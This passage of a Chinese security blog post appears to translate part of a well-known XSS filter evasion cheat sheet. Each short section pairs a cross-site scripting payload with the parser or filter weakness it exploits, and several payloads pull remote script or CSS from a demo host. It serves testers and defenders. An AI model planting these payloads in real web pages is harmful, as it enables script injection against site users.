<h3 id="2-26-利用IMG标签中JavaScript指令前的空格和元字符"><a href="#2-26-利用IMG标签中JavaScript指令前的空格和元字符" class="headerlink" title="2.26.    利用IMG标签中JavaScript指令前的空格和元字符"></a>2.26.    利用IMG标签中JavaScript指令前的空格和元字符</h3><p>如果过滤器不计算”javascript:”前的空格，这是正确的，因为它们不会被解析，但这点非常有用。因为这会造成错误的假设，就是引号和”javascript:”字样间不能有任何字符。实际情况是你可以插入任何十进制的1至32号字符：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">" &amp;#14;  javascript:alert('XSS');"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-27-利用非字母非数字字符"><a href="#2-27-利用非字母非数字字符" class="headerlink" title="2.27.    利用非字母非数字字符"></a>2.27.    利用非字母非数字字符</h3><p>FireFox的HTML解析器认为HTML关键词后不能有非字母非数字字符，并且认为这是一个空白或在HTML标签后的无效符号。但问题是有的XSS过滤器认为它们要查找的标记会被空白字符分隔。例如<code>&quot;&lt;SCRIPT\s&quot;  != &quot;&lt;SCRIPT/XSS\s&quot;</code>:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT/XSS SRC=”http:<span class="comment">//xss.rocks/xss.js“&gt;&lt;/SCRIPT&gt;</span></span><br></pre></td></tr></table></figure>

<p>基于上面的原理，可以使用模糊测试进行扩展。Gecko渲染引擎允许任何字符包括字母，数字或特殊字符（例如引号，尖括号等）存在于事件名称和等号之间，这会使得更加容易绕过跨站脚本过滤。注意这同样适用于下面看到的重音符:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;</span><br></pre></td></tr></table></figure>

<p><strong>上面发现+号可以，其他不行，下面的倒是可以用/来代替空格</strong></p>
<p>Yair Amit让我注意到了IE和Gecko渲染引擎有一点不同行为，在于是否在HTML标签和参数之间允许一个不含空格的斜杠。这会非常有用如果系统不允许空格的时候。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT/SRC=”http:<span class="comment">//xss.rocks/xss.js“&gt;&lt;/SCRIPT&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-28-额外的尖括号"><a href="#2-28-额外的尖括号" class="headerlink" title="2.28.    额外的尖括号"></a>2.28.    额外的尖括号</h3><p>由Franz  Sedlmaier提交，这个XSS攻击向量可以绕过某些检测引擎，比如先查找第一个匹配的尖括号，然后比较里面的标签内容，而不是使用更有效的算法，例如Boyer-Moore算法就是查找整个字符串中的尖括号和相应标签（当然是通过模糊匹配）。双斜杠注释了额外的尖括号来防止出现JavaScript错误：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&lt;SCRIPT&gt;alert(<span class="string">"XSS"</span>);<span class="comment">//&lt;&lt;/SCRIPT&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-29-未闭合的script标签"><a href="#2-29-未闭合的script标签" class="headerlink" title="2.29.    未闭合的script标签"></a>2.29.    未闭合的script标签</h3><p>在Firefox和Netscape  8.1的Gecko渲染引擎下你不是必须构造类似“&gt;&lt;/SCRIPT&gt;”的跨站脚本攻击向量。Firefox假定闭合HTML标签是安全的并且会为你添加闭合标记。多么体贴！不像不影响Firefox的下一个问题，这不需要在后面有额外的HTML标签。如果需要可以添加引号，但通常是没有必要的，需要注意的是，我并不知道这样注入后HTML会什么样子结束:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=http:<span class="comment">//xss.rocks/xss.js%20</span></span><br></pre></td></tr></table></figure>

<h3 id="2-30-script标签中的协议解析"><a href="#2-30-script标签中的协议解析" class="headerlink" title="2.30.    script标签中的协议解析"></a>2.30.    script标签中的协议解析</h3><p>这个特定的变体是由Łukasz  Pilorz提交的并且基于Ozh提供的协议解析绕过。这个跨站脚本示例在IE和Netscape的IE渲染模式下有效，如果添加了&lt;/SCRIPT&gt;标记在Opera中也可以。这在输入空间有限的情况下是非常有用的，你所使用的域名越短越好。”.j”是可用的，在SCRIPT标签中不需要考虑编码类型因为浏览器会自动识别。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=<span class="comment">//xss.rocks/.j&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-31-只含左尖括号的HTML-JavaScript-XSS向量"><a href="#2-31-只含左尖括号的HTML-JavaScript-XSS向量" class="headerlink" title="2.31.    只含左尖括号的HTML/JavaScript XSS向量"></a>2.31.    只含左尖括号的HTML/JavaScript XSS向量</h3><p>IE渲染引擎不像Firefox，不会向页面中添加额外数据。但它允许在IMG标签中直接使用javascript。这对构造攻击向量是很有用的，因为不需要闭合尖括号。这使得有任何HTML标签都可以进行跨站脚本攻击向量注入。甚至可以不使用”&gt;”闭合标签。注意：这会让HTML页面变得混乱，具体程度取决于下面的HTML标签。这可以绕过以下NIDS正则:<code>/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|&gt;)/</code>因为不需要”&gt;”闭合。另外在实际对抗XSS过滤器的时候，使用一个半开放的&lt;IFRAME标签替代&lt;IMG标签也是非常有效的。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">"javascript:alert('XSS')"</span></span><br></pre></td></tr></table></figure>

<h3 id="2-32-多个左尖括号"><a href="#2-32-多个左尖括号" class="headerlink" title="2.32.    多个左尖括号"></a>2.32.    多个左尖括号</h3><p>使用一个左尖括号替代右尖括号作为标签结尾的攻击向量会在不同浏览器的Gecko渲染引擎下有不同表现。没有左尖括号时，在Firefox中生效，而在Netscape中无效。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=http:<span class="comment">//xss.rocks/scriptlet.html &lt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-33-JavaScript双重转义"><a href="#2-33-JavaScript双重转义" class="headerlink" title="2.33.    JavaScript双重转义"></a>2.33.    JavaScript双重转义</h3><p>当应用将一些用户输入输出到例如：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT&gt;<span class="keyword">var</span>  a=<span class="string">"$ENV&#123;QUERY_STRING&#125;"</span>;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>的JavaScript中时，你想注入你的JavaScript脚本，你可以通过转义转义字符来规避服务器端转义引号。注入后会得到&lt;SCRIPT&gt;var a=”\”;alert(‘XSS’);//”;&lt;/SCRIPT&gt;，这时双引号不会被转义并且可以触发跨站脚本攻击向量。XSS定位器就用了这种方法:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\”;alert(‘XSS’);<span class="comment">//</span></span><br></pre></td></tr></table></figure>

<p>另一种情况是，如果内嵌数据进行了正确的JSON或JavaScript转义，但没有HTML编码，那可以结束原有脚本块并开始你自己的：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="regexp">/script&gt;&lt;script&gt;alert(‘XSS’);&lt;/</span>script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-34-闭合title标签"><a href="#2-34-闭合title标签" class="headerlink" title="2.34.    闭合title标签"></a>2.34.    闭合title标签</h3><p>这是一个简单的闭合&lt;TITLE&gt;标签的XSS攻击向量，可以包含恶意的跨站脚本攻击:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="regexp">/TITLE&gt;&lt;SCRIPT&gt;alert(“XSS”);&lt;/</span>SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-35-INPUT-image"><a href="#2-35-INPUT-image" class="headerlink" title="2.35.    INPUT image"></a>2.35.    INPUT image</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;INPUT TYPE=<span class="string">"IMAGE"</span> SRC=<span class="string">"javascript:alert(‘XSS’);"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-36-BODY-image"><a href="#2-36-BODY-image" class="headerlink" title="2.36.    BODY image"></a>2.36.    BODY image</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY BACKGROUND=<span class="string">"javascript:alert(‘XSS’)"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-37-IMG-Dynsrc"><a href="#2-37-IMG-Dynsrc" class="headerlink" title="2.37.    IMG Dynsrc"></a>2.37.    IMG Dynsrc</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG DYNSRC=<span class="string">"javascript:alert(‘XSS’)"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-38-IMG-lowsrc"><a href="#2-38-IMG-lowsrc" class="headerlink" title="2.38.    IMG lowsrc"></a>2.38.    IMG lowsrc</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG LOWSRC=<span class="string">"javascript:alert(‘XSS’)"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-39-List-style-image"><a href="#2-39-List-style-image" class="headerlink" title="2.39.    List-style-image"></a>2.39.    List-style-image</h3><p>处理嵌入的图片列表是很麻烦的问题。由于JavaScript指令的原因只能在IE渲染引擎下有效。不是一个特别有用的跨站脚本攻击向量:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;STYLE&gt;li &#123;list-style-image: url(<span class="string">"javascript:alert('XSS')"</span>);&#125;&lt;<span class="regexp">/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/</span>br&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-40-图片中引用VBscript"><a href="#2-40-图片中引用VBscript" class="headerlink" title="2.40.    图片中引用VBscript"></a>2.40.    图片中引用VBscript</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">'vbscript:msgbox("XSS")'</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-41-Livescript-仅限旧版本Netscape"><a href="#2-41-Livescript-仅限旧版本Netscape" class="headerlink" title="2.41.    Livescript (仅限旧版本Netscape)"></a>2.41.    Livescript (仅限旧版本Netscape)</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">"livescript:[code]"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-42-SVG对象标签"><a href="#2-42-SVG对象标签" class="headerlink" title="2.42.    SVG对象标签"></a>2.42.    SVG对象标签</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg/onload=alert(<span class="string">'XSS'</span>)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-43-ECMAScript-6"><a href="#2-43-ECMAScript-6" class="headerlink" title="2.43.    ECMAScript 6"></a>2.43.    ECMAScript 6</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Set</span>.constructor<span class="string">`alert\x28document.domain\x29`</span></span><br></pre></td></tr></table></figure>

<h3 id="2-44-BODY标签"><a href="#2-44-BODY标签" class="headerlink" title="2.44.    BODY标签"></a>2.44.    BODY标签</h3><p>这个方法不需要使用任何例如”javascript:”或”&lt;SCRIPT…”语句来完成XSS攻击。Dan Crowley特别提醒你可以在等号前加入一个空格(“onload=” != “onload =”):</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BODY ONLOAD=alert(<span class="string">'XSS'</span>)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-45-事件处理程序"><a href="#2-45-事件处理程序" class="headerlink" title="2.45.    事件处理程序"></a>2.45.    事件处理程序</h3><p>在XSS攻击中可使用以下事件（在完稿的时候这是网上最全的列表了）。感谢ReneLedosquet的更新。</p>
<blockquote>
<p>\1.    FSCommand() (攻击者当需要在嵌入的Flash对象中执行时可以使用此事件)</p>
<p>\2.    onAbort() (当用户中止加载图片时)</p>
<p>\3.    onActivate() (当对象激活时)</p>
<p>\4.    onAfterPrint() (用户打印或进行打印预览后触发)</p>
<p>\5.    onAfterUpdate() (从数据源对象更新数据后由数据对象触发)</p>
<p>\6.    onBeforeActivate() (在对象设置为激活元素前触发)</p>
<p>\7.    onBeforeCopy() (攻击者在选中部分拷贝到剪贴板前执行攻击代码-攻击者可以通过执行execCommand(“Copy”)函数触发)</p>
<p>\8.    onBeforeCut() (攻击者在选中部分剪切到剪贴板前执行攻击代码)</p>
<p>\9.    onBeforeDeactivate() (在当前对象的激活元素变化前触发)</p>
<p>\10.  onBeforeEditFocus() (在一个包含可编辑元素的对象进入激活状态时或一个可编辑的对象被选中时触发)</p>
<p>\11.  onBeforePaste() (在用户被诱导进行粘贴前或使用execCommand(“Paste”)函数触发)</p>
<p>\12.  onBeforePrint() (用户需要被诱导进行打印或攻击者可以使用print()或execCommand(“Print”)函数).</p>
<p>\13.  onBeforeUnload() (用户需要被诱导关闭浏览器-除非从父窗口执行，否则攻击者不能关闭当前窗口)</p>
<p>\14. onBeforeUpdate() (从数据源对象更新数据前由数据对象触发)</p>
<p>\15.  onBegin() (当元素周期开始时由onbegin 事件立即触发)</p>
<p>\16.  onBlur() (另一个窗口弹出当前窗口失去焦点时触发)</p>
<p>\17.  onBounce() (当marquee对象的behavior属性设置为“alternate”且字幕的滚动内容到达窗口一边时触发)</p>
<p>\18.  onCellChange() (当数据提供者的数据变化时触发)</p>
<p>\19.  onChange() (select，text, 或TEXTAREA字段失去焦点并且值发生变化时触发)</p>
<p>\20.  onClick() (表单中点击触发)</p>
<p>\21.  onContextMenu() (用户需要在攻击区域点击右键)</p>
<p>\22.  onControlSelect() (当用户在一个对象上创建控件选中区时触发)</p>
<p>\23.  onCopy() (用户需要复制一些东西或使用execCommand(“Copy”)命令时触发)</p>
<p>\24.  onCut() (用户需要剪切一些东西或使用execCommand(“Cut”)命令时触发)</p>
<p>\25.  onDataAvailable() (用户需要修改元素中的数据，或者由攻击者提供的类似功能)</p>
<p>\26.  onDataSetChanged() (当数据源对象变更导致数据集发生变更时触发)</p>
<p>\27.  onDataSetComplete() (数据源对象中所有数据可用时触发)</p>
<p>\28.  onDblClick() (用户双击一个表单元素或链接)</p>
<p>\29.  onDeactivate() (在激活元素从当前对象转换到父文档中的另一个对象时触发)</p>
<p>\30.  onDrag() (在元素正在拖动时触发)</p>
<p>\31.  onDragEnd() (当用户完成元素的拖动时触发)</p>
<p>\32.  onDragLeave() (用户在拖动元素离开放置目标时触发)</p>
<p>\33.  onDragEnter() (用户将对象拖拽到合法拖曳目标)</p>
<p>\34.  onDragOver() (用户将对象拖拽划过合法拖曳目标)</p>
<p>\35.  onDragDrop() (用户将一个对象（例如文件）拖拽到浏览器窗口)</p>
<p>\36.  onDragStart() (当用户开始拖动元素时触发)</p>
<p>\37.  onDrop() (当拖动元素放置在目标区域时触发)</p>
<p>\38.  onEnded() (在视频/音频（audio/video）播放结束时触发)</p>
<p>\39.  onError() (在加载文档或图像时发生错误)</p>
<p>\40.  onErrorUpdate() (当从数据源对象更新相关数据遇到错误时在数据绑定对象上触发)</p>
<p>\41.  onFilterChange() (当滤镜完成状态变更时触发)</p>
<p>\42.  onFinish() (当marquee完成滚动时攻击者可以执行攻击)</p>
</blockquote>
<blockquote>
<p>\43.  onFocus() (当窗口获得焦点时攻击者可以执行攻击代码)</p>
<p>\44.  onFocusIn() (当元素将要被设置为焦点之前触发)</p>
<p>\45.  onFocusOut() (攻击者可以在窗口失去焦点时触发攻击代码)</p>
<p>\46.  onHashChange() (当锚部分发生变化时触发攻击代码)</p>
<p>\47.  onHelp() (攻击者可以在用户在当前窗体激活时按下F1触发攻击代码)</p>
<p>\48.  onInput() (在 <input> 或 <textarea> 元素的值发生改变时触发)</textarea></p>
<p>\49.  onKeyDown() (用户按下一个键的时候触发)</p>
<p>\50.  onKeyPress() (在键盘按键被按下并释放一个键时触发)</p>
<p>\51.  onKeyUp() (用户释放一个键时触发)</p>
<p>\52.  onLayoutComplete() (用户进行完打印或打印预览时触发)</p>
<p>\53.  onLoad() (攻击者在窗口加载后触发攻击代码)</p>
<p>\54.  onLoseCapture() (可以由releaseCapture()方法触发)</p>
<p>\55.  onMediaComplete() (当一个流媒体文件使用时，这个事件可以在文件播放前触发)</p>
<p>\56.  onMediaError() (当用户在浏览器中打开一个包含媒体文件的页面，出现问题时触发事件)</p>
<p>\57.  onMessage() (当页面收到一个信息时触发事件)</p>
<p>\58.  onMouseDown() (攻击者需要让用户点击一个图片触发事件)</p>
<p>\59.  onMouseEnter() (光标移动到一个对象或区域时触发)</p>
<p>\60.  onMouseLeave() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)</p>
<p>\61.  onMouseMove() (攻击者需要让用户将光标移到一个图片或表格)</p>
<p>\62.  onMouseOut() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)</p>
<p>\63.  onMouseOver() (光标移动到一个对象或区域)</p>
<p>\64.  onMouseUp() (攻击者需要让用户点击一个图片)</p>
<p>\65.  onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)</p>
<p>\66.  onMove() (用户或攻击者移动页面时触发)</p>
<p>\67.  onMoveEnd() (用户或攻击者移动页面结束时触发)</p>
<p>\68.  onMoveStart() (用户或攻击者开始移动页面时触发)</p>
<p>\69.  onOffline() (当浏览器从在线模式切换到离线模式时触发)</p>
<p>\70.  onOnline() (当浏览器从离线模式切换到在线模式时触发)</p>
<p>\71.  onOutOfSync() (当元素与当前时间线失去同步时触发)</p>
<p>\72.  onPaste() (用户进行粘贴时或攻击者可以使用execCommand(“Paste”)函数时触发)</p>
<p>\73.  onPause() (在视频或音频暂停时触发)</p>
<p>\74.  onPopState() (在窗口的浏览历史（history 对象）发生改变时触发)</p>
<p>\75.  onProgress() (攻击者可以在一个FLASH加载时触发事件)</p>
<p>\76.  onPropertyChange() (用户或攻击者需要改变元素属性时触发)</p>
<p>\77.  onReadyStateChange() (每次 readyState 属性变化时被自动调用)</p>
<p>\78.  onRedo() (用户返回上一页面时触发)</p>
<p>\79.  onRepeat() (事件在播放完重复播放时触发)</p>
<p>\80.  onReset() (用户或攻击者重置表单时触发)</p>
<p>\81.  onResize() (用户改变窗口大小时，攻击者可以自动以这种方法触发:&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)</p>
<p>\82.  onResizeEnd() (用户完成改变窗体大小时触发)</p>
<p>\83.  onResizeStart() (用户开始改变窗体大小时触发)</p>
<p>\84.  onResume() (当元素继续播放时触发)</p>
<p>\85.  onReverse() (当元素回放时触发)</p>
<p>\86.  onRowsEnter() (用户或攻击者需要改变数据源中的一行)</p>
<p>\87.  onRowExit() (用户或攻击者改变数据源中的一行后退出时触发)</p>
<p>\88.  onRowDelete() (用户或攻击者需要删除数据源中的一行)</p>
<p>\89.  onRowInserted() (user or attacker would needto insert a row in a data source)</p>
<p>\90.  onScroll() (用户需要滚动或攻击者使用scrollBy()函数)</p>
<p>\91.  onSeek() (当用户在元素上执行查找操作时触发)</p>
<p>\92.  onSelect() (用户需要选择一些文本-攻击者可以以此方式触发: window.document.execCommand(“SelectAll”);)</p>
<p>\93.  onSelectionChange() (当用户选择文本变化时触发-攻击者可以以此方式触发: window.document.execCommand(“SelectAll”);)</p>
<p>\94.  onSelectStart() (当用户开始选择文本时触发-攻击者可以以此方式触发: window.document.execCommand(“SelectAll”);)</p>
<p>\95.  onStart() (在marquee 对象开始循环时触发)</p>
<p>\96.  onStop() (当用户按下停止按钮或离开页面时触发)</p>
<p>\97.  onStorage() (当Web Storage更新时触发)</p>
<p>\98.  onSyncRestored() (当元素与它的时间线恢复同步时触发)</p>
<p>\99.  onSubmit() (需要用户或攻击者提交表单)</p>
<p>100.onTimeError() (用户或攻击者设置时间属性出现错误时触发)</p>
<p>101.onTrackChange() (用户或攻击者改变播放列表内歌曲时触发)</p>
<p>102.onUndo() (用户返回上一浏览记录页面时触发)</p>
<p>103.onUnload() (用户点击任意链接或按下后退按钮或攻击者强制进行点击时触发)</p>
<p>104.onURLFlip() (当一个高级流媒体格式（ASF）文件，由一个HTML+TIME（基于时间交互的多媒体扩展）媒体标签播放时，可触发在ASF文件中内嵌的攻击脚本)</p>
<p>105.seekSegmentTime() (这是一个方法可以定位元素某个时间段内中的特定的点，并可以从该点播放。这个段落包含了一个重复的时间线，并包括使用AUTOREVERSE属性进行反向播放。)</p>
</blockquote>
<h3 id="2-46-BGSOUND"><a href="#2-46-BGSOUND" class="headerlink" title="2.46.    BGSOUND"></a>2.46.    BGSOUND</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BGSOUND SRC=<span class="string">"javascript:alert('XSS');"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-47-amp-JavaScript包含"><a href="#2-47-amp-JavaScript包含" class="headerlink" title="2.47.    &amp; JavaScript包含"></a>2.47.    &amp; JavaScript包含</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BR SIZE=<span class="string">"&amp;&#123;alert('XSS')&#125;"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-48-样式表"><a href="#2-48-样式表" class="headerlink" title="2.48.    样式表"></a>2.48.    样式表</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;LINK REL=<span class="string">"stylesheet"</span> HREF=<span class="string">"javascript:alert('XSS');"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-49-远程样式表"><a href="#2-49-远程样式表" class="headerlink" title="2.49.    远程样式表"></a>2.49.    远程样式表</h3><p>(利用像远程样式表一样简单的形式，你可以将XSS攻击代码包含在可使用内置表达式进行重定义的样式参数里。)这只在IE和使用IE渲染模式Netscape8.1+。注意这里没有任何元素在页面中表明这页面包含了JavaScript。提示：这些远程样式表都使用了body标签,所以必须在页面中有除了攻击向量以外的内容存在时才会生效,  也就是如果是空白页的话你必须在页面添加一个字母来让攻击代码生效:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;LINK REL=<span class="string">"stylesheet"</span> HREF=<span class="string">"http://xss.rocks/xss.css"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-50-远程样式表2"><a href="#2-50-远程样式表2" class="headerlink" title="2.50.    远程样式表2"></a>2.50.    远程样式表2</h3><p>这个和上面一样有效，不过使用了&lt;STYLE&gt;标签替代&lt;LINK&gt;标签.  这个细微的变化曾经用来攻击谷歌桌面。另一方面，如果在攻击向量后有HTML标签闭合攻击向量，你可以移除末尾的&lt;/STYLE&gt;标签。在进行跨站脚本攻击时，如不能同时使用等号或斜杠，这是非常有用的，这种情况在现实世界里不止一次发生了:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;STYLE&gt;@<span class="keyword">import</span><span class="string">'http://xss.rocks/xss.css'</span>;&lt;/STYLE&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-51-远程样式表3"><a href="#2-51-远程样式表3" class="headerlink" title="2.51.    远程样式表3"></a>2.51.    远程样式表3</h3><p>这种方式仅在Opera 8.0(9.x不可以)中有效，但方法比较有创意.  根据RFC2616，设置一个Link头部不是HTTP1.1规范的一部分,但一些浏览器仍然允许这样做 (例如Firefox和  Opera).  这里的技巧是设置一个头部（和普通头部并没有什么区别，只是设置Link: &lt;<a href="http://xss.rocks/xss.css\&gt;" target="_blank" rel="noopener">http://xss.rocks/xss.css\&gt;</a>; REL=stylesheet）并且在远程样式表中包含使用了JavaScript的跨站脚本攻击向量，这一点是FireFox不支持的:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;META HTTP-EQUIV=<span class="string">"Link"</span> Content=<span class="string">"&lt;http://xss.rocks/xss.css&gt;; REL=stylesheet"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-52-远程样式表4"><a href="#2-52-远程样式表4" class="headerlink" title="2.52.    远程样式表4"></a>2.52.    远程样式表4</h3><p>这仅能在Gecko渲染引擎下有效并且需要在父页面绑定一个XML文件。具有讽刺意味的是 Netscape认为Gecko更安全 ，所以对绝大多数网站来说会受到漏洞影响:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;STYLE&gt;BODY&#123;-moz-binding:url(<span class="string">"http://xss.rocks/xssmoz.xml#xss"</span>)&#125;&lt;<span class="regexp">/STYLE&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id><a href="#" class="headerlink" title></a></h3>
    </div>
    <div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------　　　　本文结束　<i class="fa fa-heart"></i>　感谢您的阅读　　　　-------------</div>
    
</div>
      
    </div>

    
    
    
        
      
        <div id="reward-container">
  <div><p style="font-size:14px; color:#34495e; margin:0 0 5px 0;">觉得不错可以请我喝杯咖啡～</p></div>
  <button id="reward-button" disable="enable" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
        
      
      <div style="display: inline-block">
        <img src="/images/wechat.png" alt="Gality 微信支付">
        <p>微信支付</p>
      </div>

  </div>
</div>

      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/WEB/" rel="tag"># WEB</a>
            
              <a href="/tags/CTF/" rel="tag"># CTF</a>
            
              <a href="/tags/XSS/" rel="tag"># XSS</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2019/10/11/XSS-二/" rel="next" title="XSS(二)">
                  <i class="fa fa-chevron-left"></i> XSS(二)
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
            </div>
          </div>
        
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    
    <div class="comments" id="comments"></div>
  

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-介绍"><span class="nav-number">1.</span> <span class="nav-text">1.介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-测试"><span class="nav-number">2.</span> <span class="nav-text">2.测试</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-XSS定位器"><span class="nav-number">2.1.</span> <span class="nav-text">2.1.  XSS定位器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-XSS定位器（短）"><span class="nav-number">2.2.</span> <span class="nav-text">2.2.  XSS定位器（短）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-无过滤绕过"><span class="nav-number">2.3.</span> <span class="nav-text">2.3.  无过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-4-利用多语言进行过滤绕过"><span class="nav-number">2.4.</span> <span class="nav-text">2.4.  利用多语言进行过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-5-通过JavaScript命令实现的图片XSS"><span class="nav-number">2.5.</span> <span class="nav-text">2.5.  通过JavaScript命令实现的图片XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-6-无分号无引号"><span class="nav-number">2.6.</span> <span class="nav-text">2.6.  无分号无引号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-7-不区分大小写的XSS攻击向量"><span class="nav-number">2.7.</span> <span class="nav-text">2.7.  不区分大小写的XSS攻击向量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-8-HTML实体"><span class="nav-number">2.8.</span> <span class="nav-text">2.8.  HTML实体</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-9-重音符混淆"><span class="nav-number">2.9.</span> <span 